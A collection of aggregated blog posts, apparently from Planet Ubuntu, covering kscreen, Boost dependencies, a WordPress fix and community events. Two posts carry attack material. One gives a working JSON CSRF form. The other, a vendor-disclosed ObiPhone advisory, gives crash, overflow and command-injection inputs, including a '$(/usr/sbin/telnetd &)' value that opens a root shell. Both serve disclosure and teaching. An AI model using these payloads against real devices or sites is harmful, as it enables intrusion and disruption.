At an architectural level, this is a sound design: the roles are clearly separated, the low-level bits are suitably abstracted to allow re-use of code, the API presents what matters to the user, implementation details are hidden. Most importantly, aside from a few bugs, it works as expected, and in principle, there’s no reason why it shouldn’t.

So much for the theory. In reality, we’re dealing with a huge amount of complexity. There are hardware events such as suspending and waking up with different configurations; the laptop’s lid may be closed or opened (and when that happens, we don’t even get an event that it closed); displays come and go depending on their connection; the same piece of hardware might support completely different resolutions; hardware comes with broken EDID information; display connectors come and go, and so do display controllers (CRTCs); and on top of all that, the only way we get to know what actually works in reality for the user is the “throw stuff against the wall and observe what sticks” tactic.

This is the fabric of nightmares. Since I prefer to not sleep, but hack at night, I seemed to be the right person to send into this battle. (Coincidentally, I was also “crowned” kscreen maintainer a few months ago, but let’s stick to drama here.)

So, anyway, as I already mentioned in an earlier blog entry, we had some problems restoring configurations. In certain situations, displays weren’t enabled or were positioned unreliably, or kscreen failed to restore configurations altogether, making it “forget” settings.

Better tools

Debugging these issues is not entirely trivial. We need to figure out at which level they happen (for example in our xrandr implementation, in other parts of the library, or in the daemon). We also need to figure out what exactly happens, and when. A complex architecture like this brings a number of synchronization problems with it, and these are hard to debug when you have to figure out what exactly goes on across log files. In Plasma 5.8, kscreen will log its activity into one consolidated, categorized and time-stamped log. This rather simple change has already been a huge help in getting to know what’s really going on, and it has helped us identify a number of problems.

A tool which I’ve been working on is kscreen-doctor. On the one hand, I needed a debugging helper tool that can give system information useful for debugging. Perhaps more importantly, I knew I’d be missing a command-line tool to futz around with screen configurations from the command line or from scripts as Wayland arrives. kscreen-doctor allows changing the screen configuration at runtime, like this:

Disable the hdmi output, enable the laptop panel and set it to a specific mode
$ kscreen-doctor output.HDMI-2.disable output.eDP-1.mode.1 output.eDP-1.enable

Position the hdmi monitor on the right of the laptop panel
$ kscreen-doctor output.HDMI-2.position.0,1280 output.eDP-1.position.0,0

Please note that kscreen-doctor is quite experimental. It’s a tool that allows you to shoot yourself in the foot, so user discretion is advised. If you break things, you get to keep the pieces. I’d like to develop this into a more stable tool in kscreen, but for now: don’t complain if it doesn’t work or eats your hamster.

Another neat testing tool is Wayland. The video wall configuration you see in the screenshot is unfortunately not real hardware I have around here. What I’ve done instead is run a Wayland server with these “virtual displays” connected, which in turn allowed me to reproduce a configuration issue. I’ll spare you the details of what exactly went wrong, but this kind of trick allows us to reproduce problems with much more hardware than I ever want or need in my office. It doesn’t stop there: I’ve added this hardware configuration to our unit-testing suite, so we can make sure that this case is covered and working in the future.

on August 24, 2016 01:16 PM

A coworker and I were looking at an application today that, like so many other modern web applications, offers a RESTful API with JSON being used for serialization of requests/responses. She noted that the application didn’t include any sort of CSRF token and didn’t seem to use any of the headers (X-Requested-With, Referer, Origin, etc.) as a “poor man’s CSRF token”, but since it was posting JSON, was it really vulnerable to CSRF? Yes, yes, definitely yes!

The idea that the use of a particular encoding is a security boundary is, at worst, a completely wrong notion of security, and at best, a stopgap until W3C, browser vendors, or a clever attacker gets hold of your API. Let’s examine JSON encoding as a protection against CSRF and demonstrate a mini-PoC.

The Application

We have a basic application written in Go. Authentication checking is elided for post size, but this is not just an unauthenticated endpoint.

package main

import (
	"encoding/json"
	"fmt"
	"net/http"
)

type Secrets struct {
	Secret int
}

var storage Secrets

func handler(w http.ResponseWriter, r *http.Request) {
	if r.Method == "POST" {
		json.NewDecoder(r.Body).Decode(&storage)
	}
	fmt.Fprintf(w, "The secret is %d", storage.Secret)
}

func main() {
	http.HandleFunc("/", handler)
	http.ListenAndServe(":8080", nil)
}

As you can see, it basically serves a secret number that can be updated via HTTP POST of a JSON object. If we attempt a URL-encoded or multipart POST, the JSON decoding fails miserably and the secret remains unchanged. We must POST JSON in order to get the secret value changed.
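
As an illustration (not from the original post), assuming the server above is running on localhost:8080 and the secret still holds its zero value, the difference can be seen with curl, which sends a form-encoded body by default:

$ curl -s -X POST -d 'secret=1337' http://localhost:8080/
The secret is 0
$ curl -s -X POST -d '{"secret": 1337}' http://localhost:8080/
The secret is 1337

The first body fails to decode as JSON, so the secret is untouched; the second is valid JSON and updates it, regardless of the Content-Type curl attaches.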

Exploring Options

So let’s explore our options here. The site can locally use AJAX via the XMLHttpRequest API, but due to the Same-Origin Policy, an attacker’s site cannot use this. For most CSRF, the way to get around this is plain HTML forms, since form submission is not subject to the Same-Origin Policy. The W3C had a draft specification for JSON forms, but that has been abandoned since late 2015 and isn’t supported in any browsers. There are probably some techniques that can make use of Flash or other browser plugins (aren’t there always?), but it can even be done with basic forms; it just takes a little work.

JSON in Forms

Normally, if we try to POST JSON as, say, a form value, it ends up being URL encoded, not to mention including the field name.

<form method='POST'>
  <input name='json' value='{"foo": "bar"}'>
  <input type='submit'>
</form>

Results in a POST body of:

json=%7B%22foo%22%3A+%22bar%22%7D

Good luck decoding that as JSON!

Doing it as the form field name doesn’t get any better.

%7B%22foo%22%3A+%22bar%22%7D=value

It turns out you can set the enctype of your form to text/plain and avoid the URL encoding on the form data. At this point, you’ll get something like:

json={"foo": "bar"}

Unfortunately, we still have to contend with the form field name and the separator (=). This is a simple matter of splitting our payload across both the field name and value, and sticking the equals sign in an unused field. (Or you can use it as part of your payload if you need one.)

Putting it All Together

<body onload='document.forms[0].submit()'>
  <form method='POST' enctype='text/plain'>
    <input name='{"secret": 1337, "trash": "' value='"}'>
  </form>
</body>

This results in a request body of:

{"secret": 1337, "trash": "="}

This parses just fine and updates our secret!
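
As an aside, and not something the original application does: one common hardening step is to refuse to decode POST bodies that do not declare a JSON media type, since plain HTML forms can only send application/x-www-form-urlencoded, multipart/form-data or text/plain, and a cross-origin XMLHttpRequest/fetch that sets a JSON Content-Type triggers a CORS preflight. It is defence in depth, not a substitute for real CSRF tokens. A minimal sketch, assuming "mime" is added to the import block above and the route is registered as http.HandleFunc("/", requireJSON(handler)):

// requireJSON wraps a handler and rejects POST requests whose Content-Type
// is not application/json, blocking the text/plain form trick shown above.
func requireJSON(next http.HandlerFunc) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if r.Method == "POST" {
			ct, _, err := mime.ParseMediaType(r.Header.Get("Content-Type"))
			if err != nil || ct != "application/json" {
				http.Error(w, "expected application/json", http.StatusUnsupportedMediaType)
				return
			}
		}
		next(w, r)
	}
}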

on August 24, 2016 07:00 AM

August 23, 2016

Razer Hardware on Linux

Aaron Honeycutt

One of the things that stopped me from moving to Ubuntu Linux full time on my desktop was the lack of support for my Razer BlackWidow Chroma. For those who do not know about it: pretty link. It is a very pretty keyboard with every key programmable to be a different color or effect. I found a super cool program on GitHub to make it work on Ubuntu/Linux Mint, Debian and maybe a few others, since the source is available here: source link

Here is what the application looks like:
Screenshot of the Polychromatic application

It even has a tray applet to change the colors and effects quickly.

on August 23, 2016 08:40 PM

August 22, 2016

Ubuntu in Philadelphia

Elizabeth K. Joseph

Last week I traveled to Philadelphia to spend some time with friends and speak at FOSSCON. While I was there, I noticed a Philadelphia area Linux Users Group (PLUG) meeting would land during that week and decided to propose a talk on Ubuntu 16.04.

But first I happened to be out getting my nails done with a friend on Sunday before my talk. Since I was there, I decided to Ubuntu theme things up again. Drawing freehand, the manicurist gave me some lovely Ubuntu logos.

Girly nails aside, that’s how I ended up at The ATS Group on Monday evening for a PLUG West meeting. They had a very nice welcome sign for the group. Danita and I arrived shortly after 7PM for the Q&A portion of the meeting. This pre-presentation time gave me the opportunity to pass around my BQ Aquaris M10 tablet running Ubuntu. After the first unceremonious pass, I sent it around a second time with more of an introduction, and the Bluetooth keyboard and mouse combo so people could see convergence in action by switching between the tablet and desktop view. Unlike my previous presentations, I was traveling so I didn’t have my bag of laptops and extra tablet, so that was the extent of the demos.

The meeting was very well attended and the talk went well. It was nice to have folks chiming in on a few of the topics (like the transition to systemd) and there were good questions. I also was able to give away a copy of our The Official Ubuntu Book, 9th Edition to an attendee who was new to Ubuntu.

Keith C. Perry shared a video of the talk on G+ here. Slides are similar to past talks, but I added a couple since I was presenting on a Xubuntu system (rather than Ubuntu) and didn’t have pure Ubuntu demos available: slides (7.6M PDF, lots of screenshots).

After the meeting we all had an enjoyable time at The Office, which I hadn’t been to since moving away from Philadelphia almost seven years ago.

Thanks again to everyone who came out, it was nice to meet a few new folks and catch up with a bunch of people I haven’t seen in several years.

Saturday was FOSSCON! The Ubuntu Pennsylvania LoCo team showed up to have a booth, staffed by long-time LoCo member Randy Gold.

They had Ubuntu demos, giveaways from the Ubuntu conference pack (lanyards, USB sticks, pins) and I dropped off a copy of the Ubuntu book for people to browse, along with some discount coupons for folks who wanted to buy it. My Ubuntu tablet also spent time at the table so people could play around with that.


Thanks to Randy for the booth photo!

At the conference closing, we had three Ubuntu books to raffle off! They seemed to go to people who appreciated them and since both José and I attended the conference, the raffle winners had 2/3 of the authors there to sign the books.


My co-author, José Antonio Rey, signing a copy of our book!
on August 22, 2016 07:53 PM

Note that this a duplicate of the advisory sent to the full-disclosure mailing list.

Introduction

Multiple vulnerabilities were discovered in the web management interface of the ObiHai ObiPhone products. The vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive.

Affected Devices and Versions

ObiPhone 1032/1062 with firmware less than 5-0-0-3497.

Vulnerability Overview

Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length

Vulnerability Details

Obi-1. Memory corruption leading to free() of an attacker-controlled address

By providing a long URI (longer than 256 bytes) not containing a slash in a request, a pointer is overwritten which is later passed to free(). By controlling the location of the pointer, this would allow an attacker to affect control flow and gain control of the application. Note that the free() seems to occur during cleanup of the request, as a 404 is returned to the user before the segmentation fault.

python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479d8b18 in free () from root/lib/libc.so.6
#1  0x00135f20 in ?? ()
(gdb) x/5i $pc
=> 0x479d8b18 <free+48>:        ldr     r3, [r0, #-4]
   0x479d8b1c <free+52>:        sub     r5, r0, #8
   0x479d8b20 <free+56>:        tst     r3, #2
   0x479d8b24 <free+60>:        bne     0x479d8bec <free+260>
   0x479d8b28 <free+64>:        tst     r3, #4
(gdb) i r r0
r0             0x41     65

Obi-2. Command injection in WiFi Config

An authenticated user (including the lower-privileged “user” user) can enter a hidden network name similar to “$(/usr/sbin/telnetd &)”, which starts the telnet daemon.

GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
Host: foo
Authorization: [omitted]

Note that telnetd is now running and accessible via user “root” with no password.

Obi-3. Denial of Service due to buffer overflow

By providing a long URI (longer than 256 bytes) beginning with a slash, memory is overwritten beyond the end of mapped memory, leading to a crash. Though no exploitable behavior was observed, it is believed that memory containing information relevant to the request or control flow is likely overwritten in the process. strcpy() appears to write past the end of the stack for the current thread, but it does not appear that there are saved link registers on the stack for the devices under test.

python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479dc440 in strcpy () from root/lib/libc.so.6
#1  0x001361c0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/5i $pc
=> 0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
   0x479dc44c <strcspn>:        push    {r4, r5, r6, lr}
   0x479dc450 <strcspn+4>:      ldrb    r3, [r0]
(gdb) i r r1 r2
r1             0xb434df01       3023363841
r2             0xff     255
(gdb) p/x $r1+$r2
$1 = 0xb434e000

Obi-4. Buffer overflow in internal socket handler

Commands to be executed by realtime backend process obid are sent via Unix domain sockets from obiapp. In formatting the message for the Unix socket, a new string is constructed on the stack. This string can overflow the static buffer, leading to control of program flow. The only vectors leading to this code that were discovered during the assessment were authenticated, however unauthenticated code paths may exist. Note that the example command can be executed as the lower-privileged “user” user.

GET /wifi?checkssid=[A*1024] HTTP/1.1
Host: foo
Authorization: [omitted]

(gdb) 
#0  0x41414140 in ?? ()
#1  0x0006dc78 in ?? ()

Obi-5. Cross-site request forgery

All portions of the web interface appear to lack any protection against Cross-Site Request Forgery. Combined with the command injection vector in Obi-2, this would allow a remote attacker to execute arbitrary shell commands on the phone, provided the victim’s browser session was logged in to the phone.

Obi-6. Failure to implement RFC 2617 correctly

RFC 2617 specifies HTTP digest authentication, but the ObiPhone does not implement it correctly. Its HTTP digest authentication fails to comply in the following ways:

  • The URI is not validated
  • The application does not verify that the nonce received is the one it sent
  • The application does not verify that the nc value does not repeat or go backwards

    GET / HTTP/1.1
    Host: foo
    Authorization: Digest username="admin", realm="a", nonce="a", uri="/", algorithm=MD5, response="309091eb609a937358a848ff817b231c", opaque="", qop=auth, nc=00000001, cnonce="a"
    Connection: close

    HTTP/1.1 200 OK
    Server: OBi110
    Cache-Control: must-revalidate, no-store, no-cache
    Content-Type: text/html
    Content-Length: 1108
    Connection: close

Please note that the realm, nonce, cnonce, and nc values were all chosen by the client, and the response was generated offline.
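
To illustrate why accepting an arbitrary nonce, nc, and cnonce is a problem, here is a minimal Python sketch (not part of the original advisory) of how a client can compute such a response entirely offline using the RFC 2617 qop=auth construction. The password below is a placeholder; the output only matches a real device if the real credentials are used.

import hashlib

def md5_hex(data):
    return hashlib.md5(data.encode()).hexdigest()

# Values the client is free to choose, mirroring the request above.
username, realm, password = "admin", "a", "admin"  # password is a placeholder
method, uri = "GET", "/"
nonce, nc, cnonce, qop = "a", "00000001", "a", "auth"

ha1 = md5_hex("%s:%s:%s" % (username, realm, password))
ha2 = md5_hex("%s:%s" % (method, uri))
response = md5_hex("%s:%s:%s:%s:%s:%s" % (ha1, nonce, nc, cnonce, qop, ha2))
print(response)  # value for the response="..." field of the Authorization header

Because the server never checks that the nonce is one it issued, or that nc increases, it will accept replayed or precomputed values like these.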

Obi-7. Invalid pointer dereference due to invalid header

Sending an invalid HTTP Authorization header, such as “Authorization: foo”, causes the program to attempt to read from an invalid memory address, leading to a segmentation fault and reboot of the device. This requires no authentication, only access to the network to which the device is connected.

GET / HTTP/1.1
Host: foo
Authorization: foo

This causes the server to dereference the address 0xFFFFFFFF, presumably returned as a -1 error code.

(gdb) bt
#0  0x479dc438 in strcpy () from root/lib/libc.so.6
#1  0x00134ae0 in ?? ()
(gdb) x/5i $pc
=> 0x479dc438 <strcpy+8>:       ldrb    r3, [r1, #1]!
   0x479dc43c <strcpy+12>:      cmp     r3, #0
   0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
(gdb) i r r1
r1             0xffffffff       4294967295

Obi-8. Null pointer dereference due to malicious URL

If the /obihai-xml handler is requested without any trailing slash or component, this leads to a null pointer dereference, crash, and subsequent reboot of the phone. This requires no authentication, only access to the network to which the device is connected.

GET /obihai-xml HTTP/1.1
Host: foo

(gdb) bt
#0  0x479dc7f4 in strlen () from root/lib/libc.so.6
Backtrace stopped: Cannot access memory at address 0x8f6
(gdb) info frame
Stack level 0, frame at 0xbef1aa50:
pc = 0x479dc7f4 in strlen; saved pc = 0x171830
Outermost frame: Cannot access memory at address 0x8f6
Arglist at 0xbef1aa50, args: 
Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
(gdb) x/5i $pc
=> 0x479dc7f4 <strlen+4>:       ldr     r2, [r1], #4
   0x479dc7f8 <strlen+8>:       ands    r3, r0, #3
   0x479dc7fc <strlen+12>:      rsb     r0, r3, #0
   0x479dc800 <strlen+16>:      beq     0x479dc818 <strlen+40>
   0x479dc804 <strlen+20>:      orr     r2, r2, #255    ; 0xff
(gdb) i r r1
r1             0x0      0

Obi-9. Denial of service due to invalid content-length

Content-Length headers of -1, -2, or -3 result in a crash and device reboot. This does not appear exploitable to gain execution. Larger (more negative) values return a page stating “Firmware Update Failed” though it does not appear any attempt to update the firmware with the posted data occurred.

POST / HTTP/1.1
Host: foo
Content-Length: -1

Foo

This appears to write a constant value of 0 to an address controlled by the Content-Length parameter, but since it appears to be relative to a freshly mapped page of memory (perhaps via mmap() or malloc()), it does not appear this can be used to gain control of the application.

(gdb) bt
#0  0x00138250 in HTTPD_msg_proc ()
#1  0x00070138 in ?? ()
(gdb) x/5i $pc
=> 0x138250 <HTTPD_msg_proc+396>:       strb    r1, [r3, r2]
  0x138254 <HTTPD_msg_proc+400>:       ldr     r1, [r4, #24]
  0x138258 <HTTPD_msg_proc+404>:       ldr     r0, [r4, #88]   ; 0x58
  0x13825c <HTTPD_msg_proc+408>:       bl      0x135a98
  0x138260 <HTTPD_msg_proc+412>:       ldr     r0, [r4, #88]   ; 0x58
(gdb) i r r3 r2
r3             0xafcc7000       2949410816
r2             0xffffffff       4294967295

Mitigation

Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.

Author

The issues were discovered by David Tomaschik of the Google Security Team.

Timeline

  • 2016/05/12 - Reported to ObiHai
  • 2016/05/12 - Findings Acknowledged by ObiHai
  • 2016/05/20 - ObiHai reports working on patches for most issues
  • 2016/06/?? - New Firmware posted to ObiHai Website
  • 2016/08/18 - Public Disclosure
on August 22, 2016 07:00 AM

A few weeks ago, I hacked up go-wmata, some golang bindings to the WMATA API. This is super handy if you are in the DC area, and want to interface to the WMATA data.

As a proof of concept, I wrote a Yo bot called @WMATA, which returns the closest station when you Yo it your location. For hilarity, feel free to Yo it from outside DC.

For added fun, and puns, I wrote a dbus proxy for the API as well, at wmata-dbus, so you can query the next train over dbus. One thought was to make a GNOME Shell extension to tell me when the next train is due. I’d love help with this (or pointers on how to learn how to do this right).
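
For anyone curious what talking to such a proxy from Python might look like, here is a minimal sketch using dbus-python. The bus name, object path, interface, and method are placeholders made up for illustration, not the actual wmata-dbus API, so check the project for the real names.

import dbus

BUS_NAME = "org.example.WMATA"      # placeholder, not the real bus name
OBJECT_PATH = "/org/example/WMATA"  # placeholder
INTERFACE = "org.example.WMATA"     # placeholder

bus = dbus.SessionBus()
proxy = bus.get_object(BUS_NAME, OBJECT_PATH)
wmata = dbus.Interface(proxy, dbus_interface=INTERFACE)

# Hypothetical method: ask when the next train arrives at a station.
print(wmata.NextTrain("Metro Center"))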

on August 22, 2016 02:16 AM

August 21, 2016

Recently I generated diagrams showing the header dependencies between Boost libraries, or rather, between various Boost git repositories. Diagrams showing dependencies for each individual Boost git repo are here along with dot files for generating the images.

The monster diagram is here:

Edges and Incidental Modules and Packages

The directed edges in the graphs represent that a header file in one repository #includes a header file in the other repository. The idea is that, if a packager wants to package up a Boost repo, they can’t assume anything about how the user will use it. A user of Boost.ICL can choose whether ICL will use Boost.Container or not by manipulating the ICL_USE_BOOST_MOVE_IMPLEMENTATION preprocessor macro. So, the packager has to list Boost.Container as some kind of dependency of Boost.ICL, so that when the package manager downloads the boost-icl package, the boost-container package is automatically downloaded too. The dependency relationship might be a ‘suggests’ or ‘recommends’, but the edge will nonetheless exist somehow.

In practice, packagers do not split Boost into packages like that. At least for Debian packages, they split compiled static libraries into packages such as libboost-serialization1.58, and put all the headers (all header-only libraries) into a single package, libboost1.58-dev. Perhaps the reason packagers put it all together is that there is little value in splitting the header-only repositories of monolithic Boost from each other if everything will be packaged anyway. Or perhaps the sheer number of repositories makes splitting impractical. This is in contrast to KDE Frameworks, which does consider such edges and dependency graph size when determining where functionality belongs. Typically KDE aims to define the core functionality of a library on its own in a loosely coupled way with few dependencies, and then add integration and extension for other types in higher level libraries (if at all).

Another feature of my diagrams is that repositories which depend circularly on each other are grouped together in what I called ‘incidental modules’. The name is inspired by ‘incidental data structures’ which Sean Parent describes in detail in one of his ‘Better Code’ talks. From a packager point of view, the Boost.MPL repo and the Boost.Utility repo are indivisible because at least one header of each repo includes at least one header of the other. That is, even if packagers wanted to split Boost headers in some way, the ‘incidental modules’ would still have to be grouped together into larger packages.

As far as I am aware such circular dependencies don’t fit with Standard C++ Modules designs or the design of Clang Modules, but that part of C++ would have to become more widespread before Boost would consider their impact. There may be no reason to attempt to break these ‘incidental modules’ apart if all that would do is make some graphs nicer, and it wouldn’t affect how Boost is packaged.

My script for generating the dependency information is simply grepping through the include/ directory of each repository and recording the #included files in other repositories. This means that while we know Boost.Hana can be used stand-alone, if a packager simply packages up the include/boost/hana directory, the result will have dependencies on parts of Boost because Hana includes code for integration with existing Boost code.
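
To make the approach concrete, here is a rough Python sketch of that kind of scan. It illustrates the idea rather than reproducing the actual script, and it glosses over the fact that mapping an included header back to its owning repository is messier in practice.

import collections
import os
import re

# Matches e.g. '#include <boost/container/set.hpp>' and captures 'container'.
INCLUDE_RE = re.compile(r'#\s*include\s*[<"]boost/([^/<>"]+)')

def scan_repos(root):
    """For each Boost repo under root, record which other repos its headers include."""
    deps = collections.defaultdict(set)
    for repo in os.listdir(root):
        include_dir = os.path.join(root, repo, "include")
        for dirpath, _dirs, files in os.walk(include_dir):
            for name in files:
                if not name.endswith((".hpp", ".h", ".ipp")):
                    continue
                with open(os.path.join(dirpath, name), errors="ignore") as header:
                    for line in header:
                        match = INCLUDE_RE.search(line)
                        # Like a packager (or bcp), ignore any #ifdef guards around the include.
                        if match and match.group(1) != repo:
                            deps[repo].add(match.group(1))
    return deps

Turning that mapping into dot files for Graphviz is then only a few more lines.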

Dependency Analysis and Reduction

One way of defining a Boost library is to consider the group of headers which are gathered together and documented together to be a library (there are other ways which some in Boost prefer – it is surprisingly fuzzy). That is useful for documentation at least, but as evidenced above it does not appear to be useful from a packaging point of view. So, are these diagrams useful for anything?

While Boost header-only libraries are not generally split in standard packaging systems, the bcp tool is provided to allow users to extract a subset of the entire Boost distribution into a user-specified location. As far as I know, the tool scans header files for #include directives (ignoring ifdefs, like a packager would) and gathers together all of the transitively required files. That means that these diagrams are a good measure of how much stuff the bcp tool will extract.

Note also that these edges do not contribute time to your slow build – reducing edges in the graphs by moving files won’t make anything faster. Rewriting the implementation of certain things might, but that is not what we are talking about here.

I can run the tool to generate a usable Boost.ICL which I can easily distribute. I delete the docs, examples and tests from the ICL directory because they make up a large chunk of the size. Such a ‘subset distribution’ doesn’t need any of those. I also remove 3.5M of preprocessed files from MPL. I then need to define BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS when compiling, which is easy and explained at the end:

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf myicl/libs/icl/{doc,test,example}
$ rm -rf myicl/boost/mpl/aux_/preprocessed
$ du -hs myicl/
15M     myicl/

Ok, so it’s pretty big. Looking at the dependency diagram for Boost.ICL you can see an arrow to the ‘incidental spirit’ module. Looking at the Boost.Spirit dependency diagram you can see that it is quite large.

Why does ICL depend on ‘incidental spirit’? Can that dependency be removed?

For those ‘incidental modules’, I selected one of the repositories within the group and named the group after that one repository. To see why ICL depends on ‘incidental spirit’, we have to examine all 5 of the repositories in the group to check which one is responsible for the dependency edge.

boost/libs/icl$ git grep -Pl -e include --and \
  -e "thread|spirit|pool|serial|date_time" include/
include/boost/icl/gregorian.hpp
include/boost/icl/ptime.hpp

Formatting wide terminal output is tricky in a blog post, so I had to make some compromises in the output here. Those ICL headers are including Boost.DateTime headers.

I can further see that gregorian.hpp and ptime.hpp are ‘leaf’ files in this analysis. Other files in ICL do not include them.

boost/libs/icl$ git grep -l gregorian include/
include/boost/icl/gregorian.hpp
boost/libs/icl$ git grep -l ptime include/
include/boost/icl/ptime.hpp

As it happens, my ICL-using code also does not need those files. I’m only using icl::interval_set<double> and icl::interval_map<double>. So, I can simply delete those files.

boost/libs/icl$ git grep -l -e include \
  --and -e date_time include/boost/icl/ | xargs rm
boost/libs/icl$

and run the bcp tool again.

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf myicl/libs/icl/{doc,test,example}
$ rm -rf myicl/boost/mpl/aux_/preprocessed
$ du -hs myicl/
12M     myicl/

I’ve saved 3M just by understanding the dependencies a bit. Not bad!

Mostly the size difference is accounted for by no longer extracting boost::mpl::vector, and secondly the Boost.DateTime headers themselves.

The dependencies in the graph are now so few that we can consider each one, wonder why it is there, and ask whether it can be removed. For example, there is a dependency on the Boost.Container repository. Why is that?

include/boost/icl$ git grep -C2 -e include \
   --and -e boost/container
#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/map.hpp>
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <map>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>

So, Boost.Container is only included if the user defines ICL_USE_BOOST_MOVE_IMPLEMENTATION, and otherwise not. If we were talking about C++ code here we might consider this a violation of the Interface Segregation Principle, but we are not, and unfortunately the realities of the preprocessor mean this kind of thing is quite common.

I know that I’m not defining that and I don’t need Boost.Container, so I can hack the code to remove those includes, e.g.:

index 6f3c851..cf22b91 100644
--- a/include/boost/icl/map.hpp
+++ b/include/boost/icl/map.hpp
@@ -12,12 +12,4 @@ Copyright (c) 2007-2011:
 
-#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
-#   include <boost/container/map.hpp>
-#   include <boost/container/set.hpp>
-#elif defined(ICL_USE_STD_IMPLEMENTATION)
 #   include <map>
 #   include <set>
-#else // Default for implementing containers
-#   include <map>
-#   include <set>
-#endif

This and following steps don’t affect the filesystem size of the result. However, we can continue to analyze the dependency graph.

I can break apart the ‘incidental fusion’ module by deleting the iterator/zip_iterator.hpp file, removing further dependencies in my custom Boost.ICL distribution. I can also delete the iterator/function_input_iterator.hpp file to remove the dependency on Boost.FunctionTypes. The result is a graph which you can at least reason about being used in an interval tree library like Boost.ICL, quite apart from our starting point with that library.

You might shudder at the thought of deleting zip_iterator if it is an essential tool to you. Partly I want to explore in this blog post what will be needed from Boost in the future when we have zip views from the Ranges TS or use the existing ranges-v3 directly, for example. In that context, zip_iterator can go.

Another feature of the bcp tool is that it can scan a set of source files and copy only the Boost headers that are included transitively. If I had used that, I wouldn’t need to delete the ptime.hpp or gregorian.hpp etc because bcp wouldn’t find them in the first place. It would still find the Boost.Container etc includes which appear in the ICL repository however.

In this blog post, I showed an alternative approach to the bcp --scan attempt at minimalism. My attempt is to use bcp to export useful and as-complete-as-possible libraries. I don’t have a lot of experience with bcp, but it seems that in scanning mode I would have to re-run the tool any time I used an ICL header which I had not used before. With the modular approach, it would be less-frequently necessary to run the tool (only when directly using a Boost repository I hadn’t used before), so it seemed an approach worth exploring the limitations of.

Examining Proposed Standard Libraries

We can also examine other Boost repositories, particularly those which are being standardized by newer C++ standards because we know that any, variant and filesystem can be implemented with only standard C++ features and without Boost.

Looking at Boost.Variant, it seems that use of the Boost.Math library makes that graph much larger. If we want Boost.Variant without all of that Math stuff, one thing we can choose to do is copy the one math function that Variant uses, static_lcm, into the Variant library (or somewhere like Boost.Core or Boost.Integer for example). That does cause a significant reduction in the dependency graph.

Further, I can remove the hash_variant.hpp file to remove the Boost.Functional dependency.

I don’t know if C++ standardized variant has similar hashing functionality or how it is implemented, but it is interesting to me how it affects the graph.

Using a bcp-extracted library with Modern CMake

After extracting a library or set of libraries with bcp, you might want to use the code in a CMake project. Here is the modern way to do that:

add_library(boost_mpl INTERFACE)
target_compile_definitions(boost_mpl INTERFACE
    BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS
)
target_include_directories(boost_mpl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl"
)

add_library(boost_icl INTERFACE)
target_link_libraries(boost_icl INTERFACE boost_mpl)
target_include_directories(boost_icl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl/libs/icl/include"
)
add_library(boost::icl ALIAS boost_icl)

Boost ships a large chunk of preprocessed headers for various compilers, which I mentioned above. The reasons for that are probably historical and now obsolete, but the files will remain, they are used by default with GCC, and that will not change. To diverge from that default it is necessary to set the BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS preprocessor macro.

By defining an INTERFACE boost_mpl library and setting its INTERFACE target_compile_definitions, any user of that library gets that magic BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS define when compiling its sources.

MPL is just an internal implementation detail of ICL though, so I won’t have any of my CMake targets using MPL directly. Instead I additionally define a boost_icl INTERFACE library which specifies an INTERFACE dependency on boost_mpl with target_link_libraries.

The last ‘modern’ step is to define an ALIAS library. The alias name is boost::icl and it aliases the boost_icl library. To CMake, the following two commands generate an equivalent buildsystem:

target_link_libraries(myexe boost_icl)
target_link_libraries(myexe boost::icl)

Using the ALIAS version has a different effect, however: if the boost::icl target does not exist, an error will be issued at CMake time. That is not the case with the boost_icl version. It makes sense to use target_link_libraries with targets with :: in the name, and ALIAS makes that possible for any library.


on August 21, 2016 08:48 PM

If you are someone who likes to use WordPress and you run into this little issue (Abort Class-pclzip.php : Missing Zlib) while importing a slider with Revolution Slider, don't worry, the solution is as follows:

  1. Edit the file located inside the wp-admin/includes/ folder: sudo nano /path-to-your-site/wp-admin/includes/class-pclzip.php
  2. Find the line if (!function_exists('gzopen')) and replace gzopen with gzopen64.

With that small change you can keep using the plugin without any problems.

Now, why does this error happen? In the latest versions of Ubuntu, gzopen (the PHP function that lets us open a .gz compressed file) is only included for the 64-bit architecture, which is why it is necessary to replace gzopen with gzopen64 so that we can import all those files compressed in this format.

Happy Hacking!


on August 21, 2016 05:37 PM

Help a friend?

Valorie Zimmerman

